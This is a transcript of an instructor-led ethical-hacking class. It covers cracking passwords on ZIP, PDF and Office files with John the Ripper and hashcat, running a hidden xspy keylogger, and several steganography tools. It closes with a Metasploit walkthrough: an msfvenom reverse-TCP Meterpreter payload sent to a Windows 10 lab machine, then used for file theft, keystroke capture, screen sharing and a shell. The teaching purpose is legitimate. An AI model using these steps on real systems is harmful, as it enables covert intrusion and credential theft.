Good evening, everyone.
Good evening, sir. Good evening, sir.
So yesterday we completed password cracking. Okay, and I also showed you attack on the VFTP server. So today we are going to start with document password cracking. Okay. So okay. So I have to check where is my cd/home/kali. Mhm. cd desktop cd password. Okay, so these are my files, and I am showing you how exactly these files are actually opening up. Now, see, first I am opening my okay. So it is first asking for the document file also. Provide the password, then only it will open up. Similarly, is for the PDF file also. And similarly, these are my zip file and rar file. So if you want to unzip this file, first it asks a password. Then only the file would be encrypted, extracted. Okay. So these files are called as password protected files. So if an user or a person sending a password protected file, or he is actually saved the password protected file in their machines, and they are thinking about that my file is secure, now no one can able to open the file without knowing the password. So it is not like that. If someone or an attacker, if he wants to crack the password of a file, he can able to do that. So we are going to see how an attacker is actually going to do this task. Okay. So first of all, yesterday, actually I cracked the um, password of the operating system's user. Okay. With the help of John Ripper tool. So whenever we actually crack the password, the hash values are stored in a particular file. So I have to replace the content of that file, then only it will crack the other particular passwords. That means there is a file cd tilde slash dot john. Inside this file, there is a file john.port, cat john.port, and these are the hash values are stored. Okay. So I have to actually first remove these content. So how I am going to remove these content from here? Echo I actually passed a value over here. Now if I see the john.port, now the content is removed. So what happens if these particular hash values are being stored? So if I try to crack the password of any document, so the particular john.port file contains the previously changed passwords. Okay, previously attacked passwords. So I have to change this history, which is stored inside the john.port. Now I am going to /home/kali/desktop cd pass protected, and these are the password protected files. Okay. Now how we are actually going to crack these password protected files? So the tool which I am using, that is the same tool, John Ripple tool I am using, and John Ripple tool actually providing so many different features in it, to cracking the zip files, to crack the document file, to crack the Excel file, to crack the PDF files, different file formats. It is actually providing different functions. So first I am going to show you how to crack the zip file and fetch the password of a zip file which is protected by a password. So the command is, I am using a command zip to John space. The file name of my zip file is myzip.zip. Okay. Then space greater than symbol. Then space. Actually, I am passing the hash values of this particular password protected file to a particular file. I put the name hash.txt, whatever name you want to give to the file, you can able to give it. I am providing the name hash.txt. It is not compulsory to provide this name. So the command is zip to zone space myzip.zip, then space greater than symbol, then space whatever the file name where you want to store the hash value. Okay. Now I am opening up this file with the VI editor, or I am opening this file with the help of okay, VI editor, nano editor. I am opening this file with the help of nano editor. Okay, hash.txt. Fine. Now see what I have to do. From here to here, from here to here, I have to change, I have to delete the content of this file. The file content from here means starting from the dollar. Rest all the content I have to delete it. So I am deleting my content of this file. In the end of the file also, I have to delete the content. Okay, fine. from the starting of the file also and from the end of the file also. In downside also, I have to delete the content till dollar, and from the starting also I have to delete the content till dollar, like this. Okay, so in the both the line, these are the hash values. So I have to delete these contents. This is the proper hash value which is exactly stored inside the txt file. Now I have to save this file. For saving the file, Control O, enter, Control X. Control O for saving, Control X for exiting from the nano editor. Then after that, I'm using a tool, Hashcat, space -a space 0 space -m 13,600 space hash.txt space common.txt from till here. So what exactly it is doing with the help of hashcat command? It is actually matching this hash value with the common.txt file. And the responsibility of hashcat is to convert this hash value to the clear text content and matching with the common.txt. This is the word list file. So we always need a word list file to matching the proper passwords, because the work of the word list file is to store lots of password in it so that the attacker would able to match the password with the hash.txt file. Okay, so minimum password and supported kernel, all the things have been done properly. Now space ---- show command, press enter. Now the password of this file is AST. So if I want to check it, yeah, myzip.zip, right click on my zip file, extract here, asking the password. Password is ASD. Click on OK. See, it opens the file. These are the content which is stored inside this zip file. So I cracked the password of zip file, and with the help of that password, I able to extract the compressed file or the zip file, and I am able to see the actual content which is stored inside the directory. Got it? Now, second one, I am going to crack the PDF file. Okay. So for cracking the password of the PDF file, the command is PDF to John space the name of the PDF file, then space greater than symbol, then space the hash.txt file, which actually stores the hash value of the PDF file passwords. Press enter. It stores the password. Now, when we are cracking the PDF file, we do not need to open the hash.txt file and edit anything over there. We directly using the John Ripper tool again. If in the PDF file, no need to use hashcat command. Here I am using John command, space ---- format equal to the extension of the file is PDF space hash.txt, then space ---- word list, and the name of the word list file is common.txt. Okay. Now I am pressing enter. Now it is showing the password FABY0409. This is the password of this PDF file. Now let's check it. PDF in capital FABY 0409. Unlock the document. So it unlocks the document over here. Got it? So like this, we can able to crack the password of PDF with the help of PDF to John command. And after that, with the help of John command, I am comparing this hash file, hash content with the common.txt file. Fine. So it is showing the password. Now, my next task is to crack the document file. So for cracking the document file, I am using the command office to John space and the name of my, let's check what is the name of my document file is. The document file name is new one dot document. Okay. So office to John space new one dot doc space greater than symbol and passing you to the hash.txt file. Press enter. It stores the hash value inside the hash.txt file. Now we have to edit the hash.txt file with the help of nano command, nano space hash.txt. Then we need to remove the syntax till dollar. So I am deleting the content here till dollar, and from the end of the file also I have to remove the No, I done a mistake. Control X. Without saving, I am putting the nano editor. Now again, I am opening up. I only have to syntax from here. From the end of the file, we do not need to delete anything. Yeah, we do not need to delete anything. So just Control O, enter Control X. Okay. Then after that, John space hyphen wordlist equal to common.txt space hash.txt. So with the help of John Ripper tool, I'm actually comparing the wordlist file with my hash.txt file. Let's see whether it is showing or not. It is showing the password is AST. So my document file, it is password protected and the password is AST. Okay. Then your Excel file, the method is same, but both the commands are same. Okay. There also you have to use office to John new dot XLS, then pass the hash value to the hash.txt file. Then after that, with the help of nano command, open the hash.txt file then after that delete till dollar, in end nothing, control O, enter, control X, then with the help of John tool, hyphen word list, and it is also showing the password. So like this, we can able to crack each and every password protected file with the help of John Ripper tool. Got it? Any doubt? Any doubt?
No, sir.
Media files. Actually, I didn't see anywhere that media files are been protected with the passwords. So if those files are also been protected with the passwords, yes, we can crack the password of those files also, if that particular file is protected with the password. Directly, not with any particular software. If you are using any third-party software to provide the password, then obviously it needs that particular software. JPG is not a media file. Okay, okay. Yeah. Of course, we can able to do that one also. JPG file we can able to do. Okay. Now, we are little bit talk about spyware. Spyware means if we are actually inserting any malware which has the spyware virus is there, and if we are inserting that spyware virus to a victim's machine, so we can able to spy the machines. And how we are able to spy those machines? And spyware is, and also there are some spyware softwares are also been there in a market through which we can able to monitor the data, files, and behaviors of the victim's machine. Okay, so if we talk about a simple spyware, that is a okay, I will show you later on when I show you how to attack on an operating system. At that time, I will show you how to spyware it. Okay, that time I will show you how we can able to spy a particular machine. Okay, this is exactly the spyware through which we can able to spy on a particular operating system or an application. Then next is keylogger. So keylogger is basically a software that collects the data you type on your computer keyboard. In addition to the keyboard, computer mouse actives can also be stolen by the keylogger. The stolen data is used by the cyber attackers to fulfill their malicious intentions, such like stealing money through online banking, sending abusive email messages, selling private data to advertising companies. So keylogger, whenever the keylogger is installed or if attacking on any operating system, they are basically using any keyloggers. At that time, whatever the victim is doing in their machine with the help of keyboard strokes, the attacker can able to see each thing. So suppose that he opens the Gmail and providing the username and password over there. So that particular username password would be hitting in the keyboard, that will be captured by the attacker's end. That is known as keylogger. So that I will also show you in a described way when I attacked on the Windows operating system. Right now, I will show a simple tool right now. Okay, there is a XSpy tool which we can able to run in my Kali Linux operating system, and with the help of XSpy tool, I will show you a demonstration how the keyloggers is actually working on. So the ability of the keyloggers varies according to their type and target. The various types of recorded data are password entered by user, computer screenshots from time to time, web browser activities, list the programs, okay, like this. So for running the keylogger, first of all, you have to install the keylogger. Simple. The command is apt space install space xspy. Xspy. This thing. Okay. Now what I am doing, I am just opening up my notepad here. Okay, and I am typing something in my notepad. I am showing you the particular victim is using a notepad and he is actually trying to write it anything. And in keylogger, see the keylogger XSpy, it is also showing the same thing over here. So when he typed hello, suppose that he typed the username, he typed password. This is only a demo how the keylogger is exactly working. So suppose that someone is installed the XSpy tool in your machine. So the victim is don't know about that particular tool, then the keylogger is actively functioning in its own machine. Okay. But right now, whenever the tool is running on, whatever the victim is actually written over here, it is showing in my XSpy tool. So if I don't want to see like this, so there is different ways also. So XSpy space double greater than symbol, and suppose that I'm going to create file log.txt like this, okay? And this command, what will happen when I run this command, okay? Or an attacker is going to type anything, username, friend, anything. So it is actually storing these content inside this file. Okay, I'm breaking this command over here. And if I want to check the cat log.txt, it is showing. Okay, it is showing whatever I write down, it is showing over here. But in this condition also, echo in this particular criteria also, when I run the command, it is showing that someone is actually doing something because our terminal had been blinking the cursor over there. So if I want, no one can able to judge XSpy space, then ampersand symbol. Ampersand means shift plus 7. Okay, so that symbol is ampersand symbol. So at that time, what will happen? See, now the attacker is actually run the command and put the terminal like this. Now the victim does not know that a keylogger is running over here. Now suppose that mm, now suppose that I'm showing something different. Uh, don't say C. So what I run the command ls, it shows the content. Then after that, suppose that I run the command cat space slash etc slash issue cat space slash etc slash star dot release. So like this, I run the commands over here. Now, if an attacker comes and check what exactly are stored inside the log.txt file, so he see the clear command is run, ls command runs, cat command is runs. Okay, like this. So cat space. So whenever it we provide the say space or slash or anything. So when I provide the slash, it is actually looking like this. And okay, I'm open my browser. In browser, suppose I open the file test php.oneweb.com. I'm doing the work in my browser. Internal server is aspire vision tech.com. And click on login. And suppose I provide a random username password. Okay. Now check what it saves. Cat log dot aspire vision tech dot, in place of dot it is showing period .com. Then I click on login. Username I provided test, and the password is also I provided test. So there is a method to read the content which is stored by the access spy. Okay, and it is showing each and everything whatever the victim is actually doing in its operating system. Keystrokes, it is actually storing the keystrokes. But I am only showing a demo to you. This is not a live keylogger. I will show you later on how the live keyloggers are actually working on. Okay. Now, next topic is steganography. So what is exactly the steganography is? So steganography is a method in which we can able to hide our confidential files, messages into some other file, like in JPG files, in media files, like this. That means, suppose that someone want to send a confidential file to a particular person from the by using mail. Okay. And he do not want to send directly that particular file attached with the mail, because it is a confidential file, and he thought that there is a risk factor. If someone else got this file, so he will get the confidential information. So steganography is a method by which he can able to hide the actual file inside the some other targeted files. Like there is a JPG file you have. So you hide your particular confidential file inside the JPG file. If you want to hide the messages inside the JPG file, so we can able to do that one. So that is known as steganography. So steganography is the art and science of emitting secret messages in a cover message in such a way that no one apart from the sender and recipient can able to see it. To hide the content inside the image file, inside the video file, inside the audio file, like this. Okay. So how we can able to do the steganography? So for the steganography, the documents, in the downloads, yeah. So in the downloads, I have some picture files. Okay. So so now what I'm going to do, I'm going to hide a particular file inside this image file, So what content we are going to hide? Suppose that this particular zip file. Okay. So I want to hide this particular zip file to the image file, like this. So a person wants to send this zip file to a targeted sender, and this particular file is a confidential file. He wants no one can able to access it. So if this file, we can able to hide this file inside this image file, that is known as steganography. So let's see how we can able to do this. This is inside the downloads. Okay. CD downloads. ls our file is image.jpg is my file. Okay. So see how we are going to do. File is data.zip. This file I am going to hide it. So cat space image dot jpg space data. The file name is data.zip. Okay. Then space greater than symbol. Then space provide another JPG file. So what it will do, this is the actual image file which I already contain. What I want use this image file and hide this content into the image file and create a new image file in which this particular data.zip file would be steganographed. So let's see. Done. ls. So flower output dot jpg. Where is output dot jpg? This is the output dot jpg. Let's see. This is my output.jpg file is. Where is my output.jpg file? This one. Now see, I am opening this file. See, by looking this file, no one can able to imagine that something is hiding inside this file. Anyone can able to imagine that something is hiding in this file. See this file and says this actual file. No one just imagine that anything is hiding over there. Now, what the person do? He can going to send this particular image file through the mail. If someone attack on the mail or fetch this file from the in between the sender and the receiver, and when he fetch this file and open this file, he has no idea that something is hiding over here. Okay. But only the sender and the receiver know that the file which is sent by the sender, it is actually steganographed. So when he received this file, now he is going to extract the particular file and fetch the actual file or the particular file which he want to, which is actually hidden inside the output file, the confidential file. So how we can able to that? So for doing that one, it is very simple. Run a simple command, unzip space output.jpg. Now see carefully. Here data.zip file is there, but the unzip file is not here. Means a folder whose name is data, that particular folder is not here. It is only a zip file is here. When I unzip this file, what will happen? It will extract the file from there, the confidential file, and it will show, it will create a folder over here. See, I pressed enter. See, the data directory is here. Now I got the file. This particular folder is exactly hiding in this JPG file, and no one have any idea that there is a file which is hiding inside this output file. One more thing you see. I am checking the property of this file. The size of this file is 56 KB. Okay. And size of this data directory is 4 KB. Okay. That means 56 plus 4. This file should be near about 60 KB. But when we check the file size, it is showing the same size. Yeah, it is showing the 60 KB. Okay. So only the sender as receiver is actually knows that the particular file is contain a confidential file. So we have done a steganography. The method which I showed you, that is a simple method. With the help of cat command, I actually hide the content inside the JPG file. But there are some more methods are there through which we can able to hide the data inside the particular file. So let's see how we can able to do those things. So for that, first of all, I am going to what I have to do. First of all, I deleted this file. Okay, I delete the output.jpg file, and I have to hide another file inside the image.jpg file. Okay, so let's see how we can going to do. ls command. What we are actually going to do now? this file. I will hide this file inside the image.jpg file, inside this file. So now I am directly hiding a file inside a JPG file. Okay, so this is my confidential file. I want to hide the file inside my picture file. Here I am using a tool. Now the second method through which we can able to do the steganography, that is with the help of tool. And the tool which I am using, that is steg hide space EMBED space hyphen EF space uh, hash.txt and then space hyphen CF space image.jpg. So this is the command by which I am hiding my hash.txt file inside the image.jpg file. Now it is asking set a password. So this image file has a password. I provided a password ASD, press enter. Again provide the password, press enter, done. Now see, the image.jpg file is there, and if someone wants to open this file, then I will able to open it. That password is not for the opening the file. That password is set if someone wants to extract the file from the picture file, then he has to provide the similar password over there. Otherwise, the person would not able to extract the file from the image file. Okay. And if you see the size of this file, the size of the file is something different. Okay. Fine. Now what I am going to do, I am going to delete this hash.txt file. Why am I deleting? Because the hash.txt file is already there. So how would I able to know whether the hash.txt file is extracted or not? So I deleted the hash.txt file. Fine. Now after that, I'm again run the command steg hide space. For extracting, command is extract. Then space hyphen sf, then space which file? Image.jpg file. Okay. So I already deleted the hash.txt file from here. When I extract this file, it asks the password. If you don't know the password, you cannot able to extract it. I provided the password. Now see, extracted the data hash.txt. Now the hash.txt file is here. Fine. So like this, with the help of steg hide command, you can able to hide a file inside a image file, and you can also able to set the password. So no one can able to extract it also without knowing the password. Okay, that password is not exactly for opening up any file. It is actually for the extracting of the steganography. So steg hide command is only used to provide the passwords. Now after that, I'm showing you one more command to do the steganography. Okay. So what I have to do, I have to just delete this file, then paste this file and rename the name image.jpg. So why I deleted that file? Because it already hiding a file. So it is not a fresh file. So that's why I removed that file. Now I have a fresh file to hide inside this image file. And for hiding the file, now I'm going to use a command called outguess. So outguess space -d space hash.txt file space image.jpg file space output.jpg. So hide this file using this image file inside the output.jpg file. Press enter and let's see whether my output.jpg file is created or not. And with the help of outguess, it will decrease the size of the file. Where it would be near about 60 KB, now it is half of that. Okay, so when we are using outguess, it is not increasing the file size, it is actually decreasing the file size. Okay. Now I want to unhide the file from this image file. So for unhiding, I hided the hash.txt file. I deleted the file hash.txt and I am going to extract the file from the out.jpg file with the help of outguess command. So out guess space -r space output.jpg space hash.txt. So in this command, I have to know the name of the hided file. Then only it will show you. Now see, hash.txt file, I recovered it. Okay. So this is known as steganography. So steganography is the method through which you can able to hide your confidential file inside a JPG file. I showed you the JPG file steganography. Okay, image file steganography. Any doubt regarding steganography? Anything you want to ask?
No, sir.
Now I'm showing you one more thing that is called as NTFS stream. Okay. So in NTFS stream, what we will able to do, we can able to suppose that you created a file. Okay, a text file is already there. And if you want to create one more file, which is actually hidden inside the actual file, that hidden content of the second file is known as NTFS stream. Hmm. Um, Wait a minute, I'm seeing something. So I'm creating a directory. Mike. Inside this directory, I'm creating a file echo space welcome and new.txt. Like this, I created a file. Okay. This file, I'm able to see it. I also able to see the content inside this file also. Now, NTFS stream means if I want to create one more file and we want to hide that particular file inside this new.txt file. Okay. That is known as NTFS stream. Like, see, echo space to the college and then new dot txt colon second dot txt. Press enter. Something is not correct. Cat new dot txt colon. No, something I am missing. Hmm. Something I am missing here. Mhm. What I am missing? Mhm. The command is correct, but it is not working properly. Okay, fine. We'll just wait. I am doing with this, doing the same thing in my Windows operating system. Let's check whether it is working over there or not. Open the command prompt. Okay. Yeah. So new.txt file is already here. Okay. Now see, I am running the command here. Echo space new.txt colon. Okay. Here it is actually working on. So I created one more file, but at that time I provided the name something like this. So second.txt file is not showing over here. This file is hidden inside this file. We cannot able to see the content of this file. Suppose that if you want to see the content of new.txt file, so it is only showing the welcome. Now, this particular content is not showing over here. Okay. So if you want to see the hidden content of the second.txt file, then you have to use the command more less than symbol new.txt colon second.txt. Now it will show the content. So the particular file is hiding a second file, and it will not show you whether the any other file is exist in this file, and it will also not show you the content of the file also. With the help of specific command, and the person who know that the second.txt or whatever the name of the file is exactly, when he know the name of the file, and with this particular command, with this particular parameter, when he run the command, then only he can able to see the content which is stored inside this. So this is known as NTFS stream. Okay. Suppose that if you want to see the files which are hidden inside a particular file, that will also possible. There is a file which is hidden inside this file txt, inside the new.txt, and if a person want to know whether something is hidden in this file, that is also possible. So you have to just download a particular tool that is called as stream.exe. So I already have. Wait a minute. I already have stream folder. Inside the stream folder, the command is yeah, this one, stream.exe. Okay. So what I'm doing, I just copied this file from here and pasted over here in stream file, stream directory. Let's see whether it is able to do the task or not. cd dot cd str stream The directory is there, na stream dir inside the download stream directories stream stream stream. Yeah, okay. Then stream stream.exe space new.txt. See, it is showing that second dot is inside the type of this tool. We can able to know that someone or a particular text hiding any other text file or not. Okay. Now, a last thing is white space steganography. So, what is known as white space steganography? Mm, so, whenever we write a content inside a notepad or any particular application, when I press the button Control A, it is actually showing like this. That means whatever the content is actually written over there, that particular syntax is only be covered by Control A. It will select that much portion only. These portion, it is not actually selecting by the Control A. It is not selecting white space portion. Now, white space text steganography means, suppose that if you are creating a file and something is hiding over there. Okay. How? With the help of white space steganography. So at that time, if you are going to press Control A, it will look like something else. So I'm showing you how we are actually going to do this with the help of SnowDOS 32 tool. You can able to download this tool from the internet. I'm running the command. First of all, I have to get outside from there and cd snowdos snw. Okay. Snowdos 32. Okay. dir. So there is a file hello.txt is already there. Now with the help of snow snowdos 32.exe, this is the command space hyphen capital C, then space hyphen M, then after that whatever you want to store there. So this is a white space steganography like this, and then after that space hyphen P space mm, what I have to do. I'm providing a particular name, then the hello.txt file. This is the name of the file. Okay, fine. And I'm creating a out file.txt. Suppose that this is my name of the file is. Okay, I am pressing enter. So compress by this percent, message exceeded available space, and extra 5 lines are added. Okay, now see. This This out file is created. I open this file. Hello world is only showing here. Okay, nothing else. If I send this file to a sender, so this file actually hiding this content also. And how we can able to know that something is hiding in this file? If I press Control A, now see, it is set the white space also. This is known as white space steganography. So the particular person or an attacker is able to know that something is hiding over here. But what exactly is hiding? No one knows. So the SAM, what exactly the SAM I provided, that is the password. Without providing that password, the SAM is the password. So whatever the password you want to set, you can able to set there. Hyphen P means the password is. Hyphen P means the password. Okay. So if an attacker know about the password, retrieve the or unhide the data which is stored inside the hello.txt file or the outfile.txt. So if I want to see the content, what exactly stored in the white space content is. So with the help of snow DOCX space hyphen capital C, then the password, whatever the password is, and out file.txt. This is a white space steganography. Whatever I wrote, provide the syntax over there, it is showing that particular syntax. So it is all about hiding the confidential messages, syntaxes, files, directories inside a second file. We are looking after here right now. Okay.
Sir,
You want to ask anything?
yes, sir. What is the meaning of the minus C, the hyphen C and hyphen P, hyphen M?
Hyphen C means use this particular command, and hyphen M means the particular message, hyphen P means the password, and hyphen C do the steganography, do the hiding. Hyphen C you using for the hiding the particular out file content as a item as a white space steganography. Hyphen M means the particular message, and hyphen P means the password. If I am not using hyphen P, then it will do the white space steganography without the password.
Okay, so it's always it means the same always. Always minus C means command, minus M
Yeah,
means message.
yeah.
Okay.
Anything else? Now we are looking towards a demonstration called email steganography. Okay. So if you want to do the email steganography, I'm showing an email steganography with the help of a website, okay, of a web portal. So the web portal is sonic.com. Okay, it is used to encode and decode the messages. Encode and decode the messages. So first of all, I have to encode the message. So for encode the message, click on encode. Uh, okay. Encode the spam with encode a spam with a mass password. Okay, click on this one. Provide a password. Suppose that I provide the password is ASD. Enter your secret message. So the secret message is to the um, come to the green gate tomorrow. So this is the confidential message. Okay. Then so it actually encoded the message. So this is the encoded messages. Now suppose that if you message and send this message to a particular sender, okay, to a particular receiver. You send the message to a particular receiver. So no one can able to know that what exactly you want to tell them. Dear sir, madam, thank you for interest in your newsletter. It is no longer which receive your publication. Simply move. You will be immediately removed from the club. So much matters is there. Okay. But there is a particular message is hidden inside this message. Okay. So how we can able to do that one? So suppose that I send this message to a sender, receiver. So now the receiver will copy this message from there. Okay. Then again open the Smamic portal in its machine. Then click on decode. Decode the spam with password. Provide the password and paste that particular message over here. And then click on decode. Come to the green gate tomorrow. It will decode it. Okay. So this is a demonstration to do the email steganography. Got it?
Yes, sir.
So like this, we can able to encode or decode the messages and provide the confidential messages, sending the confidential messages and receive the confidential messages.
Yes, sir.
Okay.
Yes. So how reliable is this technique? Is it industry based or is there
No,
an advantage?
this is not a industry based. Okay, because in industry they are using the commands, whatever the commands I show you. Okay, I am showing you a demonstration. So these of applications are being developed by the organizations itself for their own purpose. This is a open source portal in which anyone can able to encode and decode it. Okay. Suppose that, and if we talk about an attacker, so attacker know each and everything about this. This particular website is also know the attacker. So if I am sending some kind of message, he will able to know that these kind of messages are actually encoded by the spam mimics website. Okay, so these are the open source websites. These are not reliable websites. Okay, I'm only showing you a demonstration. So organizations are actually deploying their own application for encoding and decoding.
Okay. I was actually talking about the codes earlier we use for the images and the text file.
Yeah, those are being used by the those are used by the organizations. They are using, and if we talk about your cyber cells, your CBI, so they are also using these kind of technique. Your army, your navy, these are also using these kinds of techniques. The steganography, they are using it. Okay. So I
Okay.
showed you some. Yeah.
So how robust is the technique in the industry? Is it hackable easily or it might take some
See,
strong?
each and everything is being hackable. Okay. But how much it's secure is, so it is a secure one because it is not possible to predict that a particular person, which kind of technology he used to do the steganography. So I already showed you 3 methods or 4 methods over here. So from which method you are actually doing the steganography, the attacker is not able to predict it. Okay, so that's why, and I showed you 4 methods. There are more methods are also been there to do the steganography. There are also the tools are also been available with the third-party tools through which the organization will able to do the steganography. So it is not as much easy to predict by an attacker what exactly had been done by the particular target machine or particular target person. Because by seeing the images, no one can able to judge it that these files are being steganographed files. It is hiding something. Okay, so these are very much secure.
Okay, sir. Thanks.
So yesterday we talked about Metasploit framework. Yeah. Metasploit framework is used to do the exploitation. So now we are starting with the system hacking portion. First task for doing the system hacking, we need a payload. Okay. So how we are right now, how actually going to create a payload? I am going to create a payload with the help of MSF Winamp command. Okay. Kindly turn off your mic. So I am using a command called MSF Winamp. With the help of MSF Winamp, I am going to so if we talk about the real scenario, the payloads are been created by the software developers, okay, who have the exact knowledge about the payload, how the architecture of the payload would be there. I am using a command through which I am creating a payload, that virus. I am creating a virus, malicious virus over here. Okay. So I am running a command space dot cd space dot ls and wait a minute, guys. Okay, wait a minute. Okay. Okay, fine. So I am going to create a payload first of all. And right now, whatever the payload I am creating, I am doing the system hacking to Windows 10 operating system. Okay, with the Windows 10 operating system. Right now, I am showing you how to attack on the Windows 10 operating system, how you can able to exploit the Windows 10 operating system. Okay, so when I am going to exploit the Windows 10 operating system, at that time, attacker do not need to provide any username and password. He can able to directly attack on the operating system and console. Okay, right. See how I am going to do. MSF Winamp space -p particular payload which I am actually going to use. So the particular payload I am using, that is /meter /reverse TCP. I already told you about what is exactly the reverse TCP means. Reverse _ TCP space, then the local host. So my local host IP address, I think so 27 is there. Let's see if config. So 27, yeah. So local host is 192.168.31.27. Then space local port L port. So L port I am providing, suppose that 4444. Okay. So I already told you till 1024, those are the, those are the default port numbers. So we cannot able to use those port numbers. Apart from that, those port number till 65,535, all the ports we can able to use it. So right now I am defined port number that is 4444. Then hyphen F. So hyphen F is used for format. Which type of format means which type of extension you want to use with this payload. So I want the format that is exe. Then hyphen A. Hyphen A means which particular architecture you want to use. So I want the architecture x86 and then the name of the payload. So I am going to use the name of the payload is payload.exe. So let's check the command whether it is right or not. msvinum -t interpreter L host, local port of I am pressing enter. Now it will create the payload. So it created the payload over here. Okay. Now the major part of the stuff which is actually in the real scenario, that one is a difficult part. What is that? That is, first of all, you have to send this payload to the victim's machine, first thing. And thing, the victim has to run this payload in their machine. So there are so many methods by which the victims are actually doing the wrong stuff inside this their operating system. We can able to send these payloads via phishing attacks. We can able to send these payloads via notifications. We can able to send these particular payloads via pop-ups. Okay, or some kind of third-party websites are there, which are malicious websites are there. Or from there, if the victim is actually downloading any particular application from the website, at that time the payload would be inserted in that application also. So when he run that application, the particular malicious virus would be infected to the operating system. So there are numerous ways are there by which the particular payload is exactly sent it towards the victim's end. Okay, what I am going to do here, I am going to send directly to our victim's machine. Okay, so I already told you with the help of Python command, I am able to run my HTTP server. So right now I am running my HTTP server over here, and I'm going back to the Windows machine. Here in Windows machine, I'm opening up my Firefox. In Firefox, I provided the IP address of my Kali Linux operating system. Press enter. It is pinging. Okay. Now I have to download payload.exe file. This is my payload.exe file list. I downloaded the payload.exe file. So it downloaded the payload.exe file here in my downloads. Okay, wait a minute. Hmm. I'm again going to download the payload.exe file from here. So where is my file is? This is my file. Okay. So this is my payload.exe file is. Now return back to our attacker's machine. Now attacker is going to trying to attack on the victim's machine. So for doing the attack, he is actually opening up updates Metasploit framework. So for opening the Metasploit framework, the command is msf console. Okay. Always remember, do not run the command with the root profile. Okay, I got the shell. Now, first of all, I have to define which type of exploit we want to use to do the attack. So I am using an exploit multi-handler. This exploit I am using exploit multi-handler. So use space exploit slash multi slash handler. Press enter. Now I'm inside the exploit. Now second thing, I have to set the payload. Which type of payload I am going to use. So which type of payload I actually created? I created the reverse TCP payload. So if I created the Windows meter-preter reverse TCP payload, so then we are also using that payload over here. So set payload, that is for Windows. Wait a minute, I actually press the tab. It is actually initializing. Windows meter-preter reverse TCP. Okay. So by this payload, I actually created the payload so that I am also using the same payload in my Metasploit framework. Okay. Then options. So I have to provide the local host, my own attacker's IP address. Local port is already defined 4444. Okay. So set L host, that is 192.168 .31.27. Okay, this is my own IP address, local host. Press enter. Again, see in options. Okay, fine. So everything is done. Now I am going to do the exploit. So I run the command exploit and press enter. And I'm waiting for the target machine when he is actually going to run the payload.txt. So if the victim run this particular payload, see. So when the victim run the payload, I automatically got the interpretation. If I got the interpreter, that means the attack is done successfully. I got the shell of the targeted operating system. So I done a successful attack over here. Okay. If I done this attack, what I am able to do, what an attacker is capable to do. Okay, let's see. If I run the command ls, see properly, ls, see, each and every data which is showing over here, that is exactly of my downloads directory. Right now, it is only showing the downloads directory data. Okay. I'm also able to use these data also. Okay. If I want to see my own data, my own Kali Linux machine data, then LLS. So right now it is showing my Kali Linux own data. But if I run the command ls, it will show you the Windows 10 operating system where the payload exactly executed, that data you will show. If I run the command pwd, now it is showing you are inside the C drive users victim download. So inside the download, you are actually seeing the data right now. We can able to get inside to the any directory. We can able to delete anything. We can able to create anything. Each and everything I am able to do. Okay. So each and every data you can able to use it. Now, if you want to check the system information of your targeted machine, so the command you will run sysinfo. So the machine name is this one. It is Windows 10 operating system. It is in workgroup. Login users are 2. So there are 2 users are there. If suppose that you run the command shutdown, so it will shut down that operating system. Okay, I am not going to run this command, otherwise it will shut down the operating system. If you want to suppose that LLS, I am running LLS command, or right now I have already written the LLS command, and what I want to do, suppose that this ping.php file is here. Okay, and if I want to upload this file towards the Windows 10 operating system, then run the command upload space ping.php. Completed. See. See. I send it the file over here. Okay. This should be a more malicious file than I have executed right now. This file could be more malicious than what or the previous one file. If you want to download anything from there in your own machine, that is also possible. Okay, how? See, where I am right now. cd/home/Kali. I'm inside. These are the files which is actually stored in my Kali directory. Okay. Now ls. I want to download a file from here. So if you want to download a file, suppose that I want to download a file eula.txt. Okay. So DOWNLOAD download, and spelling is E capital EULA.txt. Skipped downloading. What happened? Let's see whether it is downloaded or not. ls. It is not downloaded, I think so.
I think it is downloaded. I'm seeing
Where
it
it is?
under the downloads. Just after download.
I don't think so. It will come
Left.
inside the download. Let's see. Let's see. Okay. CD downloads.
No,
ls.
not inside the downloads. Not inside the downloads. If you look to the left column in the ls,
Okay. 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 Yeah. Yeah. Got it. Got it. Got it. So this is the file. If you want to check the file, cat eula.txt. So this is the content which is stored inside that file is. So I got the file also. Then after that, I upload the file, I download the file. If suppose that I want to run the keylogger in the target machine. Okay. So first of all, to do that one, we have to see the process. What exactly the processes are we running in our target machine. So run the command ps. So if you run the command ps, I have to check explorer.exe process. Explorer.exe. Have you seen the explorer.exe? Yeah, here, explorer.exe. And what process ID? This is my process IDs. Okay. So that means 3168 my process IDs. Okay. So that's why I checked it. I have to check the process ID. So, okay, I check the process ID, that is 3168. Now I am running the command migrate space process ID is 3168. Okay. Then nothing else. Press enter. It is trying to migrating the process ID and the migration is completed. Okay. So if I run the command get PIT, so 3168, I connected with this thing. Now I'm going to run a command scan underscore start start. Key scan underscore start. Okay. So it will start the keystroke recording. Started. The keystroke recording is started. Now see. The Windows operating system, a person or a victim whatever he is actually going to do in this machine, suppose that he is going to use test php dot vul and worldweb.com. Aspire vision tech.com. Okay, it opens it. I clicked on login. Test login. Not now. Okay, suppose that I open a email. Suppose that I open a mail. Okay, and in a mail, suppose that I am typing a mail to a particular receiver. Hi, how are you? I am sending you a confidential mail. Attachment is here. Something like this he is typing. So whatever the keystroke is actually done by the victim, each and every keystroke is recorded by the attacker. Now, if he wants to see the keystrokes, so what he has to do, he run the command key scan underscore dump. So aspirevisiontech.com, test is the username, test is the password. Then he typed, hi, how are you? This is, I am sending a confidential mail attachment. Whatever he will write over there, the attacker is able to see that. This is a live key login. Okay. This is a live key login. Then after that, if he want to see what exactly the victim is actually doing in its machine, that is also possible. He has to run a command. Your browser is open? No. Okay. SCRWN screen share. SHAR share. Now see, this is the panel which is opened over there. Now suppose that we close this panel. Don't save. This is the Kali Linux machine. Okay. I am not doing anything. See, this is my Windows 10. This is my attacker's machine. Okay. This is my attacker's machine. This is my Windows 10 machine. So whatever I am going to do here, he can able to monitor from Kali Linux. Attacker is going to monitor each and everything, whatever I am going to do. Okay. So this kind of activity is also being done by the attacker. Mm, I'm closing this one. If you want to get a shell of the target machine, run the command shell and you will get the prompt. Now, wherever you want, you can able to move out. C.log. You get inside the windows. dir cd space suppose that I'm cd space dot cd space users dir cd space victim. So whatever you want to do, you can able to do it. cd space down downloads. Yeah. So whatever you want, you can able to do. Okay. And exit, return back to the meter. Who am I? Okay. Okay. So this is how an attacker is going to attack on a particular target machine. So you guys know now how dangerous is that when you are clicking on any particular malicious link, or if you are downloaded a particular application over the unwanted websites or third-party website which is not being recognized by the Microsoft, 